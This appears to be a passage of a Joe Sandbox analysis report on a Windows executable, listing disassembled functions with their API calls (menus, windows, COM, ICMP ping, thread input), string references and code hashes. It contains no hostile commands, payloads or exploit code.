CreatePopupMenu.USER32 ref: 00C97241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C9726E
DrawMenuBar.USER32 ref: 00C97276

Strings

F, xrefs: 00C97262
0, xrefs: 00C97160

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 8bb907e3f842f75661f522204bb4e4e5bc08cbaa0c3068452ccc0e8385d14ae6
Instruction ID: 6ea67be89d96d979000809f5546716ebfc17d6ba7230bd5a62b1c353d4564f31
Opcode Fuzzy Hash: 8bb907e3f842f75661f522204bb4e4e5bc08cbaa0c3068452ccc0e8385d14ae6
Instruction Fuzzy Hash: F6414574A22205EFDF20DFA4D888F9ABBB5FF09310F14016AF915A7361D731AA10DB90

Function 00C974BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C9755E
CreateCompatibleDC.GDI32(00000000), ref: 00C97565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C97578
SelectObject.GDI32(00000000,00000000), ref: 00C97580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C9758B
DeleteDC.GDI32(00000000), ref: 00C97594
GetWindowLongW.USER32(?,000000EC), ref: 00C9759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C975B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C975BE

Strings

static, xrefs: 00C974F6

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 0501e6fa4cde407aec0579cb464ded310686be230a5663a36c3fece06d3736b3
Instruction ID: dc14745a7dddd301b5834db2ea5fd10c4d3492422d18e9daf2b1e6ac919f5397
Opcode Fuzzy Hash: 0501e6fa4cde407aec0579cb464ded310686be230a5663a36c3fece06d3736b3
Instruction Fuzzy Hash: 54314972115215ABDF129F64DC0DFDA3B69EF09320F16422AFA25D60A0C731D922DBA4

Function 00C36E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C36E3E

Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28

__gmtime64_s.LIBCMT ref: 00C36ED7
__gmtime64_s.LIBCMT ref: 00C36F0D
__gmtime64_s.LIBCMT ref: 00C36F2A
__allrem.LIBCMT ref: 00C36F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C36F9C
__allrem.LIBCMT ref: 00C36FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C36FD1
__allrem.LIBCMT ref: 00C36FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C37006
__invoke_watson.LIBCMT ref: 00C37077

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 39d58285309a8225afa1539621e628fc408ee6ae77fd11c2fb0ef0128713b281
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: DE7117B6A10717BBD728EF68DC81B5AB7B8BF04324F148229F524D7281E770DE049B90

Function 00C72527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C72542
GetMenuItemInfoW.USER32(00CD5890,000000FF,00000000,00000030), ref: 00C725A3
SetMenuItemInfoW.USER32(00CD5890,00000004,00000000,00000030), ref: 00C725D9
Sleep.KERNEL32(000001F4), ref: 00C725EB
GetMenuItemCount.USER32(?), ref: 00C7262F
GetMenuItemID.USER32(?,00000000), ref: 00C7264B
GetMenuItemID.USER32(?,-00000001), ref: 00C72675
GetMenuItemID.USER32(?,?), ref: 00C726BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C72700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C72714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C72735

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 47beee526d3ac0ed6a0513287b34231cc4d0829dca291e3945811f5c63b833b7
Instruction ID: ffd3ce9ddfb44e63c29987fca832b21150604a1e332b86dbe0d8493da0be9eef
Opcode Fuzzy Hash: 47beee526d3ac0ed6a0513287b34231cc4d0829dca291e3945811f5c63b833b7
Instruction Fuzzy Hash: 8061BF70900249AFDF25CF64DD88EBEBBB8FB05304F14805AF865A3251D731AE46EB20

Function 00C96F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C96FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C96FA8
GetWindowLongW.USER32(?,000000F0), ref: 00C96FCC
_memset.LIBCMT ref: 00C96FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C96FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C97067

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 45d5fc8fae6c617b55fc5253d04ce0636e12956d12d89454b8b309a38e2e5baf
Instruction ID: 405f1b5d1f7a464833edfea3e48507653b656475ffa52ff7a75a2c5201292ebc
Opcode Fuzzy Hash: 45d5fc8fae6c617b55fc5253d04ce0636e12956d12d89454b8b309a38e2e5baf
Instruction Fuzzy Hash: 22615A75900208AFDB11DFA4CC85FEE77B8EB09710F14419AFA15AB2A1C771AE45DB90

Function 00C66B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C66BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00C66C18
VariantInit.OLEAUT32(?), ref: 00C66C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C66C4A
VariantCopy.OLEAUT32(?,?), ref: 00C66C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C66CB1
VariantClear.OLEAUT32(?), ref: 00C66CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00C66CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C66CDC
VariantClear.OLEAUT32(?), ref: 00C66CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C66CF9

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 69d63e23818040fab0f79401b62b3c953e5cfd533f42eba68dd90f6fc2fd3f7c
Instruction ID: 6719e8a3cf979ddbcc031151d6057daf3f4377c2eb6b7983b676beb900744bc0
Opcode Fuzzy Hash: 69d63e23818040fab0f79401b62b3c953e5cfd533f42eba68dd90f6fc2fd3f7c
Instruction Fuzzy Hash: 36414475A00119AFCF10DF65D888AEEBBB9EF48354F008069E955E7261CB30EA46DF90

Function 00C883BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

CoInitialize.OLE32 ref: 00C88403
CoUninitialize.OLE32 ref: 00C8840E
CoCreateInstance.OLE32(?,00000000,00000017,00CA2BEC,?), ref: 00C8846E
IIDFromString.OLE32(?,?), ref: 00C884E1
VariantInit.OLEAUT32(?), ref: 00C8857B
VariantClear.OLEAUT32(?), ref: 00C885DC

Strings

Failed to create object, xrefs: 00C88479, 00C8852F
Invalid parameter, xrefs: 00C884FA
NULL Pointer assignment, xrefs: 00C884B3

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: cc6b72848ff730eb20722c3bc70aed135746e09faae2076b736458f91b5dbcea
Instruction ID: 0327b81276999b9a79c8ecd8848670e6f74af6ebab5751058ed433c3b972f514
Opcode Fuzzy Hash: cc6b72848ff730eb20722c3bc70aed135746e09faae2076b736458f91b5dbcea
Instruction Fuzzy Hash: E061BD716083129FD710EF14C858F6EB7E8AF86718F40481DF9829B691CB70EE48DB96

Function 00C85732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C85793
inet_addr.WSOCK32(?,?,?), ref: 00C857D8
gethostbyname.WSOCK32(?), ref: 00C857E4
IcmpCreateFile.IPHLPAPI ref: 00C857F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C85862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C85878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C858ED
WSACleanup.WSOCK32 ref: 00C858F3

Strings

Ping, xrefs: 00C85816

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 0bab2173461ba5b8aa5e59b0a6b3e1df13779c108a2a42302922ff0479bb8a9f
Instruction ID: 1eed7e33e6dc99007f84f3ad88ee55f717e54cb4ba4a1d9f3b3db12cfe071cab
Opcode Fuzzy Hash: 0bab2173461ba5b8aa5e59b0a6b3e1df13779c108a2a42302922ff0479bb8a9f
Instruction Fuzzy Hash: 3D51BE31644600DFDB20EF25CC89B6A77E4EF49314F04852AF966DB2E1DB70E941EB46

Function 00C7B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C7B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C7B546
GetLastError.KERNEL32 ref: 00C7B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00C7B5BD

Strings

READY, xrefs: 00C7B596
READONLY, xrefs: 00C7B588
UNKNOWN, xrefs: 00C7B575
NOTREADY, xrefs: 00C7B57C
INVALID, xrefs: 00C7B58F

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: d83555a324181f6c3b670a4186ecf5a6526e7e6bcb3e3d052a18b33f50cdc18f
Instruction ID: f7f77f8eea6d9cc993c67964a98505a5c80b130b44ca8819d0a2c712fd44a18f
Opcode Fuzzy Hash: d83555a324181f6c3b670a4186ecf5a6526e7e6bcb3e3d052a18b33f50cdc18f
Instruction Fuzzy Hash: E6318135A00205DFCB40EBA8C895FAEBBB4FF45310F10816AE519D7291DB719E46DB91

Function 00C68F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C69014
GetDlgCtrlID.USER32 ref: 00C6901F
GetParent.USER32 ref: 00C6903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C6903E
GetDlgCtrlID.USER32(?), ref: 00C69047
GetParent.USER32(?), ref: 00C69063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C69066

Strings

ListBox, xrefs: 00C68FD1
ComboBox, xrefs: 00C68F9C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: b4dd0a8db9f05c48fb1f48d4e4d2775ccffd38ef4210aad9d8c7099498641087
Instruction ID: a723bea567cae1e7177270bf36170ef9495c8e6ca444af4dda73f34c13240e32
Opcode Fuzzy Hash: b4dd0a8db9f05c48fb1f48d4e4d2775ccffd38ef4210aad9d8c7099498641087
Instruction Fuzzy Hash: 1621B674A00208BFDF15ABA0CC89FFEBB79EF49310F10025AF961972E1DB755955EA20

Function 00C6907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C690FD
GetDlgCtrlID.USER32 ref: 00C69108
GetParent.USER32 ref: 00C69124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C69127
GetDlgCtrlID.USER32(?), ref: 00C69130
GetParent.USER32(?), ref: 00C6914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C6914F

Strings

ListBox, xrefs: 00C690BC
ComboBox, xrefs: 00C69087

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 9b3b513228e159c794940348f3ab7852dafee22fe972cf65739c3b6d96c5e54c
Instruction ID: 7349c9ace7cff4a8d706922f9c5dee65790b4076194d58b5eb80cdb557d80dd8
Opcode Fuzzy Hash: 9b3b513228e159c794940348f3ab7852dafee22fe972cf65739c3b6d96c5e54c
Instruction Fuzzy Hash: 8521C875A00208BBDF11ABA5CC89FFEBB78EF49300F10415AF521972A1DB755556EB20

Function 00C69163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C6916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00C69184
_wcscmp.LIBCMT ref: 00C69196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C69211

Strings

smallicons, xrefs: 00C691D9
details, xrefs: 00C691BF
largeicons, xrefs: 00C691A5
SHELLDLL_DefView, xrefs: 00C69190
list, xrefs: 00C691F3

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: b169b09ff87918efefaddd0ad91588fbe114b670acc415dd18088aa42a60eab1
Instruction ID: 73b12cbba52fb3ab19d472d695b414008908de2ac0db1d43ce343dbd53e08c40
Opcode Fuzzy Hash: b169b09ff87918efefaddd0ad91588fbe114b670acc415dd18088aa42a60eab1
Instruction Fuzzy Hash: 6F11EC36248307B9FE312665DC5BEAB379CDB15720F20013AF910E54E1FE7159516954

Function 00C888AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C888D7
CoInitialize.OLE32(00000000), ref: 00C88904
CoUninitialize.OLE32 ref: 00C8890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00C88A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C88B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00CA2C0C), ref: 00C88B6F
CoGetObject.OLE32(?,00000000,00CA2C0C,?), ref: 00C88B92
SetErrorMode.KERNEL32(00000000), ref: 00C88BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C88C25
VariantClear.OLEAUT32(?), ref: 00C88C35

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 2a19107a1dcb6e46e2e1d0b1e7d344acad2b2bea2fec13092e462c24bc965721
Instruction ID: 1da7ee4d0acd39b0a50785f9b618226117ce093f0d112deda5a96c74e1984f00
Opcode Fuzzy Hash: 2a19107a1dcb6e46e2e1d0b1e7d344acad2b2bea2fec13092e462c24bc965721
Instruction Fuzzy Hash: 06C135B1208305AFD700EF64C88496AB7E9FF89348F40492DF58ADB251DB71ED4ACB56

Function 00C77990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C77A6C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: e9d3d5fd500fef92ed784b02b06d26a8dd7329bc541b4138e906deb44e87e331
Instruction ID: f0eab3af07f990f92ca3e222c12c52230230730bd28e72252d209fd2bcd38c5d
Opcode Fuzzy Hash: e9d3d5fd500fef92ed784b02b06d26a8dd7329bc541b4138e906deb44e87e331
Instruction Fuzzy Hash: A4B19C7190421E9FDB01DFA4C885BBEB7B8FF09321F208529E619E7251D734E941DB91

Function 00C711CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C711F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C71204
GetWindowThreadProcessId.USER32(00000000), ref: 00C7120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C7121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7122C
